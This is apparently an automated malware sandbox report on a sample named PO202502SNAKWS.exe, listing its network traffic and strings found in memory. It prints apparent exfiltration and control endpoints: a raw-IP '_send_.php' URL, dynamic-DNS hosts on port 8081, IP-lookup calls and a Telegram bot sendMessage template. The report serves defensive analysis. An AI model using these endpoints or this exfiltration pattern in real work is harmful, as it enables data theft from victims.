Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: f004.backblazeb2.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.groupscrea.com
Source: global traffic	DNS traffic detected: DNS query: otelrules.svc.static.microsoft

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 08:10:55 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 08:10:59 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 11 Mar 2025 08:11:01 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: AddInProcess32.exe, 0000000A.00000002.6528028447.000000000329D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.000000000334E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: PO202502SNAKWS.exe, 00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6507934250.0000000000435000.00000040.00000400.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp, nasrallah_x86.dll.3.dr, nasrallah_x86.dll.6.dr	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: PO202502SNAKWS.exe, 00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6528028447.0000000003191000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.0000000003241000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6507957226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, nasrallah_x86.dll.3.dr, nasrallah_x86.dll.6.dr	String found in binary or memory: http://aborters.duckdns.org:8081
Source: PO202502SNAKWS.exe, 00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6528028447.0000000003191000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.0000000003241000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6507957226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, nasrallah_x86.dll.3.dr, nasrallah_x86.dll.6.dr	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: 7z.exe, 00000003.00000003.1187278577.0000021C5BBF0000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1199359781.000002B6CE402000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe.6.dr, PO202502SNAKWS.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 7z.exe, 00000003.00000003.1187278577.0000021C5BBF0000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1199359781.000002B6CE402000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe.6.dr, PO202502SNAKWS.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: 7z.exe, 00000003.00000003.1187278577.0000021C5BBF0000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1199359781.000002B6CE402000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe.6.dr, PO202502SNAKWS.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: 7z.exe, 00000003.00000003.1187278577.0000021C5BBF0000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1199359781.000002B6CE402000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe.6.dr, PO202502SNAKWS.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: AddInProcess32.exe, 0000000A.00000002.6528028447.0000000003191000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.0000000003241000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: AddInProcess32.exe, 0000000A.00000002.6528028447.0000000003191000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.0000000003241000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: PO202502SNAKWS.exe, 00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6507934250.0000000000435000.00000040.00000400.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp, nasrallah_x86.dll.3.dr, nasrallah_x86.dll.6.dr	String found in binary or memory: http://checkip.dyndns.org/q
Source: AddInProcess32.exe, 0000000A.00000002.6521861084.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6521861084.000000000147F000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6518852054.0000000001167000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6558369408.0000000005FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: AddInProcess32.exe, 0000000A.00000002.6521861084.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.00000000064E0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6558369408.0000000005FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: svchost.exe, 0000000B.00000002.2866420536.0000021CA0E00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: 7z.exe, 00000003.00000003.1187278577.0000021C5BBF0000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1199359781.000002B6CE402000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe.6.dr, PO202502SNAKWS.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 7z.exe, 00000003.00000003.1187278577.0000021C5BBF0000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1199359781.000002B6CE402000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe.6.dr, PO202502SNAKWS.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: 7z.exe, 00000003.00000003.1187278577.0000021C5BBF0000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1199359781.000002B6CE402000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe.6.dr, PO202502SNAKWS.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: PO202502SNAKWS.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: 7z.exe, 00000003.00000003.1187278577.0000021C5BBF0000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1199359781.000002B6CE402000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe.6.dr, PO202502SNAKWS.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: AddInProcess32.exe, 0000000A.00000002.6528028447.000000000329D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6561961431.00000000065F2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.000000000652B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.000000000334E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.0000000006550000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6558369408.0000000006002000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6558369408.0000000005FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.11.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.11.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000008.00000002.1271841182.000001E233503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: AddInProcess32.exe, 0000000A.00000002.6521861084.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6521861084.000000000147F000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6518852054.0000000001167000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6558369408.0000000005FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: 7z.exe, 00000003.00000003.1187278577.0000021C5BBF0000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1199359781.000002B6CE402000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe.6.dr, PO202502SNAKWS.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: 7z.exe, 00000003.00000003.1187278577.0000021C5BBF0000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1199359781.000002B6CE402000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe.6.dr, PO202502SNAKWS.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: 7z.exe, 00000003.00000003.1187278577.0000021C5BBF0000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1199359781.000002B6CE402000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe.6.dr, PO202502SNAKWS.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 7z.exe, 00000003.00000003.1187278577.0000021C5BBF0000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1199359781.000002B6CE402000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe.6.dr, PO202502SNAKWS.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: AddInProcess32.exe, 0000000A.00000002.6528028447.000000000329D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6561961431.00000000065F2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.000000000652B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.000000000334E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.0000000006550000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6558369408.0000000006002000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6558369408.0000000005FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0-
Source: powershell.exe, 00000008.00000002.1246079308.000001E2236B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1246079308.000001E2236B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000008.00000002.1246079308.000001E223491000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6528028447.0000000003191000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.0000000003241000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1246079308.000001E2236B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: PO202502SNAKWS.exe, 00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6528028447.0000000003191000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.0000000003241000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6507957226.0000000000434000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, nasrallah_x86.dll.3.dr, nasrallah_x86.dll.6.dr	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000008.00000002.1246079308.000001E2236B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 7z.exe, 00000003.00000003.1187278577.0000021C5BBF0000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1199359781.000002B6CE402000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe.6.dr, PO202502SNAKWS.exe.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000008.00000002.1279773311.000001E23B6A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: AddInProcess32.exe, 0000000A.00000002.6555705690.000000000424E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6557022160.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6550633592.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: PO202502SNAKWS.exe, 00000006.00000002.1200417218.00007FFD10465000.00000002.00000001.01000000.00000006.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1200071018.00007FFD1020D000.00000002.00000001.01000000.00000007.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1200227038.00007FFD102AB000.00000004.00000001.01000000.00000007.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1200516548.00007FFD1052E000.00000004.00000001.01000000.00000006.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1304240880.00007FFD0F135000.00000002.00000001.01000000.0000000E.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1303929914.00007FFD0EF7B000.00000004.00000001.01000000.0000000F.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1303803132.00007FFD0EEDD000.00000002.00000001.01000000.0000000F.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1304346494.00007FFD0F1FE000.00000004.00000001.01000000.0000000E.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1379975255.00007FFD0EF7B000.00000004.00000001.01000000.0000000F.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1380141231.00007FFD0F135000.00000002.00000001.01000000.0000000E.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1379857549.00007FFD0EEDD000.00000002.00000001.01000000.0000000F.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1380224750.00007FFD0F1FE000.00000004.00000001.01000000.0000000E.sdmp, msvcp290.dll.6.dr, msvcp290.dll.3.dr, libcares-2.dll.6.dr, libcares-2.dll.3.dr	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: PO202502SNAKWS.exe, 00000006.00000002.1200417218.00007FFD10465000.00000002.00000001.01000000.00000006.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1200071018.00007FFD1020D000.00000002.00000001.01000000.00000007.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1200227038.00007FFD102AB000.00000004.00000001.01000000.00000007.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1200516548.00007FFD1052E000.00000004.00000001.01000000.00000006.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1304240880.00007FFD0F135000.00000002.00000001.01000000.0000000E.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1303929914.00007FFD0EF7B000.00000004.00000001.01000000.0000000F.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1303803132.00007FFD0EEDD000.00000002.00000001.01000000.0000000F.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1304346494.00007FFD0F1FE000.00000004.00000001.01000000.0000000E.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1379975255.00007FFD0EF7B000.00000004.00000001.01000000.0000000F.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1380141231.00007FFD0F135000.00000002.00000001.01000000.0000000E.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1379857549.00007FFD0EEDD000.00000002.00000001.01000000.0000000F.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1380224750.00007FFD0F1FE000.00000004.00000001.01000000.0000000E.sdmp, msvcp290.dll.6.dr, msvcp290.dll.3.dr, libcares-2.dll.6.dr, libcares-2.dll.3.dr	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: PO202502SNAKWS.exe, 0000001B.00000002.1380224750.00007FFD0F1FE000.00000004.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: PO202502SNAKWS.exe, 00000006.00000002.1200417218.00007FFD10465000.00000002.00000001.01000000.00000006.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1200071018.00007FFD1020D000.00000002.00000001.01000000.00000007.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1304240880.00007FFD0F135000.00000002.00000001.01000000.0000000E.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1303803132.00007FFD0EEDD000.00000002.00000001.01000000.0000000F.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1380141231.00007FFD0F135000.00000002.00000001.01000000.0000000E.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1379857549.00007FFD0EEDD000.00000002.00000001.01000000.0000000F.sdmp, msvcp290.dll.6.dr, msvcp290.dll.3.dr, libcares-2.dll.6.dr, libcares-2.dll.3.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: PO202502SNAKWS.exe, 00000006.00000002.1200417218.00007FFD10465000.00000002.00000001.01000000.00000006.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1200071018.00007FFD1020D000.00000002.00000001.01000000.00000007.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1304240880.00007FFD0F135000.00000002.00000001.01000000.0000000E.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1303803132.00007FFD0EEDD000.00000002.00000001.01000000.0000000F.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1380141231.00007FFD0F135000.00000002.00000001.01000000.0000000E.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1379857549.00007FFD0EEDD000.00000002.00000001.01000000.0000000F.sdmp, msvcp290.dll.6.dr, msvcp290.dll.3.dr, libcares-2.dll.6.dr, libcares-2.dll.3.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: powershell.exe, 00000008.00000002.1246079308.000001E223491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: AddInProcess32.exe, 0000000A.00000002.6528028447.0000000003278000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.000000000332A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: PO202502SNAKWS.exe, 00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6528028447.0000000003278000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6507830113.0000000000436000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.000000000332A000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, nasrallah_x86.dll.3.dr, nasrallah_x86.dll.6.dr	String found in binary or memory: https://api.telegram.org/bot
Source: AddInProcess32.exe, 0000000A.00000002.6528028447.0000000003278000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.000000000332A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
